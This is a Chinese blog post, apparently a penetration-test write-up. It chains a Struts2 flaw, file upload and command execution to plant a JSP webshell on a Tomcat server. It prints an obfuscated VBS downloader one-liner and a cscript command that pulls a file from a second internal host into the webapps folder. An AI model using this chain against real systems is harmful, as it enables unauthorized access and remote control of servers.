漏洞组合又见getshell
2019-03-19 本文已影响180人
CSeroad
前言
在项目中拿到一个比较有意思的shell。在此记录一下。
struts漏洞
拿眼一打,struts2框架。工具尝试扫描,果然存在漏洞。
![](https://img.haomeiwen.com/i1734768/1fdcb6f119598030.png)
但是确无法使用该工具的上传功能。猜测应该是权限不够导致的。
文件上传
在登录系统后发现一处文件上传。
![](https://img.haomeiwen.com/i1734768/5d98093ed3c4b7fc.png)
测试发现可进行任意文件上传。上传jsp马试试
![](https://img.haomeiwen.com/i1734768/0bd11d59fcaf23c9.png)
emmm。好像没有配置java环境,且不在同一台服务器。
尝试上传txt文本文件
![](https://img.haomeiwen.com/i1734768/9a1915fd11f4fe42.png)
访问一下。
![](https://img.haomeiwen.com/i1734768/18f92ba156224103.png)
确定是jsp马。
现在条件是:无法连接外网、有文件上传漏洞、命令执行漏洞。
怎么拿shell呢?
思路:利用命令执行powershell或vbs从192.168.40.13的服务器下载到192.168.40.21(不知为何powershell没有成功)
vbs一句话下载payload
1.echo命令输出创建downfile.vbs文件。注意转义
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
2.downfile.vbs从192.168.40.13服务器下载文件到192.168.40.21服务器
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
![](https://img.haomeiwen.com/i1734768/fb549933f971777c.png)
下载的txt文件重命名为jsp一句话木马
ok!!!尝试访问
![](https://img.haomeiwen.com/i1734768/352eea6d01ef6ffa.png)
Nice!!!
![](https://img.haomeiwen.com/i1734768/5e8d1ae4640763c8.png)